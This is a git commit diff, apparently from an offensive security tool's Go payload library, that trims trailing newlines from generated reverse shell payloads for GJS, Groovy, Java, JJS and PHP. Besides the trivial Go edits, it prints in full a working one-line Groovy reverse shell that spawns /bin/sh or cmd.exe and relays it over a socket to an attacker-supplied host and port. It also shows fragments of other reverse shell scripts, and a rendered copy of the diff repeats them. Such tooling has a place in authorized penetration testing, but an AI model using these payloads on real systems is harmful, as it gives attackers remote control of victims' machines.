Add back EOF newline and replace it with trim in payloads

terrorbyte · terrorbyte · commit f4c75abb9c57 · 2025-02-05T16:41:15.000-07:00
diff --git a/payload/reverse/gjscript.go b/payload/reverse/gjscript.go
@@ -3,6 +3,7 @@ package reverse
 import (
 	_ "embed"
 	"fmt"
+	"strings"
 )
 
 //go:embed gjscript/glib_spawn.gjs
@@ -11,11 +12,11 @@ var GJScriptDefault = GJScriptGLibSpawn
 
 // Generates Gnome JS payload.
 func (gjs *GJScriptPayload) Default(lhost string, lport int) string {
-	return fmt.Sprintf(GJScriptDefault, lhost, lport)
+	return strings.Trim(fmt.Sprintf(GJScriptDefault, lhost, lport), "\r\n")
 }
 
 // Generates a script that can be used to create a reverse shell via
 // gjs (Gnome JS - present on Ubuntu, Debian by default).
 func (gjs *GJScriptPayload) GLibSpawn(lhost string, lport int) string {
-	return fmt.Sprintf(GJScriptGLibSpawn, lhost, lport)
+	return strings.Trim(fmt.Sprintf(GJScriptGLibSpawn, lhost, lport), "\r\n")
 }
diff --git a/payload/reverse/gjscript/glib_spawn.gjs b/payload/reverse/gjscript/glib_spawn.gjs
@@ -12,4 +12,4 @@ try {
 		output.write_bytes(new GLib.Bytes(imports.byteArray.toString(out)), null);
 	}
 } catch (e) {
-}
+}
diff --git a/payload/reverse/groovy.go b/payload/reverse/groovy.go
@@ -3,6 +3,7 @@ package reverse
 import (
 	_ "embed"
 	"fmt"
+	"strings"
 )
 
 var (
@@ -12,10 +13,10 @@ var (
 )
 
 func (groovy *GroovyPayload) Default(lhost string, lport int) string {
-	return groovy.GroovyClassic(lhost, lport)
+	return strings.Trim(groovy.GroovyClassic(lhost, lport), "\r\n")
 }
 
 // A short payload that creates a reverse shell using /bin/sh -i.
 func (groovy *GroovyPayload) GroovyClassic(lhost string, lport int) string {
-	return fmt.Sprintf(GroovyClassic, lhost, lport)
+	return strings.Trim(fmt.Sprintf(GroovyClassic, lhost, lport), "\r\n")
 }
diff --git a/payload/reverse/groovy/classic.groovy b/payload/reverse/groovy/classic.groovy
@@ -1 +1 @@
-shell='/bin/sh';if(System.getProperty('os.name').indexOf('Windows')!=-1)shell='cmd.exe';Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();Socket s=new Socket('%s',%d);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
+shell='/bin/sh';if(System.getProperty('os.name').indexOf('Windows')!=-1)shell='cmd.exe';Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();Socket s=new Socket('%s',%d);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
diff --git a/payload/reverse/java.go b/payload/reverse/java.go
@@ -3,6 +3,7 @@ package reverse
 import (
 	_ "embed"
 	"fmt"
+	"strings"
 )
 
 var (
@@ -13,11 +14,11 @@ var (
 
 // Defaults to the UnflattenedJava payload.
 func (java *JavaPayload) Default(lhost string, lport int) string {
-	return java.UnflattenedJava(lhost, lport)
+	return strings.Trim(java.UnflattenedJava(lhost, lport), "\r\n")
 }
 
 // An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out
 // the shell using ProcessBuilder and then redirects input/output to/from the sockets.
 func (java *JavaPayload) UnflattenedJava(lhost string, lport int) string {
-	return fmt.Sprintf(JavaProcessBuilderInteractive, lhost, lport)
+	return strings.Trim(fmt.Sprintf(JavaProcessBuilderInteractive, lhost, lport), "\r\n")
 }
diff --git a/payload/reverse/java/process_builder.java b/payload/reverse/java/process_builder.java
@@ -19,4 +19,4 @@
 	} catch (Exception e) {}
 };
 p.destroy();
-s.close();
+s.close();
diff --git a/payload/reverse/jjs.go b/payload/reverse/jjs.go
@@ -3,6 +3,7 @@ package reverse
 import (
 	_ "embed"
 	"fmt"
+	"strings"
 )
 
 var (
@@ -25,9 +26,9 @@ var (
 func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string {
 	var script string
 	if ssl {
-		script = fmt.Sprintf(JJSShellSSL, lhost, lport)
+		script = strings.Trim(fmt.Sprintf(JJSShellSSL, lhost, lport), "\r\n")
 	} else {
-		script = fmt.Sprintf(JJSShell, lhost, lport)
+		script = strings.Trim(fmt.Sprintf(JJSShell, lhost, lport), "\r\n")
 	}
 
 	return script
diff --git a/payload/reverse/jjs/reverse_shell.jjs b/payload/reverse/jjs/reverse_shell.jjs
@@ -28,4 +28,4 @@ while (!s.isClosed()) {
 }
 
 p.destroy();
-s.close();
+s.close();
diff --git a/payload/reverse/jjs/reverse_shell_ssl.jjs b/payload/reverse/jjs/reverse_shell_ssl.jjs
@@ -42,4 +42,4 @@ while (!s.isClosed()) {
 }
 
 p.destroy();
-s.close();
+s.close();
diff --git a/payload/reverse/php.go b/payload/reverse/php.go
@@ -3,6 +3,7 @@ package reverse
 import (
 	_ "embed"
 	"fmt"
+	"strings"
 )
 
 var (
@@ -16,12 +17,12 @@ var (
 )
 
 func (php *PHPPayload) Default(lhost string, lport int) string {
-	return php.LinuxInteractive(lhost, lport)
+	return strings.Trim(php.LinuxInteractive(lhost, lport), "\r\n")
 }
 
 // A short payload that creates a reverse shell using /bin/sh -i.
 func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string {
-	return fmt.Sprintf(PHPDefault, lhost, lport)
+	return strings.Trim(fmt.Sprintf(PHPDefault, lhost, lport), "\r\n")
 }
 
 // Creates an encrypted reverse shell using PHP. The payload autodetects the operating system and
@@ -35,7 +36,7 @@ func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) stri
 		hostname = "tls://" + hostname
 	}
 
-	return fmt.Sprintf(PHPUnflattened, hostname)
+	return strings.Trim(fmt.Sprintf(PHPUnflattened, hostname), "\r\n")
 }
 
 // Creates an encrypted reverse shell using PHP, same as Unflattened, but attempts to self-delete
@@ -46,5 +47,5 @@ func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted
 		hostname = "tls://" + hostname
 	}
 
-	return fmt.Sprintf(PHPUnflattenedSelfDelete, hostname)
+	return strings.Trim(fmt.Sprintf(PHPUnflattenedSelfDelete, hostname), "\r\n")
 }
diff --git a/payload/reverse/php/unflattened.php b/payload/reverse/php/unflattened.php
@@ -64,4 +64,4 @@ function windowsDataTransfer($input, $output) {
 	}
 }
 
-?>
+?>
diff --git a/payload/reverse/php/unflattened_self_delete.php b/payload/reverse/php/unflattened_self_delete.php
@@ -72,4 +72,4 @@ function windowsDataTransfer($input, $output) {
 	}
 }
 
-?>
+?>

Original file line number	Diff line number	Diff line change
`@@ -3,6 +3,7 @@ package reverse`
`3`	`3`	`import (`
`4`	`4`	`_ "embed"`
`5`	`5`	`"fmt"`
	`6`	`+ "strings"`
`6`	`7`	`)`
`7`	`8`
`8`	`9`	`//go:embed gjscript/glib_spawn.gjs`
`@@ -11,11 +12,11 @@ var GJScriptDefault = GJScriptGLibSpawn`
`11`	`12`
`12`	`13`	`// Generates Gnome JS payload.`
`13`	`14`	`func (gjs *GJScriptPayload) Default(lhost string, lport int) string {`
`14`		`- return fmt.Sprintf(GJScriptDefault, lhost, lport)`
	`15`	`+ return strings.Trim(fmt.Sprintf(GJScriptDefault, lhost, lport), "\r\n")`
`15`	`16`	`}`
`16`	`17`
`17`	`18`	`// Generates a script that can be used to create a reverse shell via`
`18`	`19`	`// gjs (Gnome JS - present on Ubuntu, Debian by default).`
`19`	`20`	`func (gjs *GJScriptPayload) GLibSpawn(lhost string, lport int) string {`
`20`		`- return fmt.Sprintf(GJScriptGLibSpawn, lhost, lport)`
	`21`	`+ return strings.Trim(fmt.Sprintf(GJScriptGLibSpawn, lhost, lport), "\r\n")`
`21`	`22`	`}`
Original file line number	Diff line number	Diff line change
`@@ -12,4 +12,4 @@ try {`
`12`	`12`	`output.write_bytes(new GLib.Bytes(imports.byteArray.toString(out)), null);`
`13`	`13`	`}`
`14`	`14`	`} catch (e) {`
`15`		`-}`
	`15`	`+}`
Original file line number	Diff line number	Diff line change
`@@ -1 +1 @@`
`1`		-shell='/bin/sh';if(System.getProperty('os.name').indexOf('Windows')!=-1)shell='cmd.exe';Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();Socket s=new Socket('%s',%d);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
	`1`	+shell='/bin/sh';if(System.getProperty('os.name').indexOf('Windows')!=-1)shell='cmd.exe';Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();Socket s=new Socket('%s',%d);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Original file line number	Diff line number	Diff line change
`@@ -28,4 +28,4 @@ while (!s.isClosed()) {`
`28`	`28`	`}`
`29`	`29`
`30`	`30`	`p.destroy();`
`31`		`-s.close();`
	`31`	`+s.close();`
Original file line number	Diff line number	Diff line change
`@@ -42,4 +42,4 @@ while (!s.isClosed()) {`
`42`	`42`	`}`
`43`	`43`
`44`	`44`	`p.destroy();`
`45`		`-s.close();`
	`45`	`+s.close();`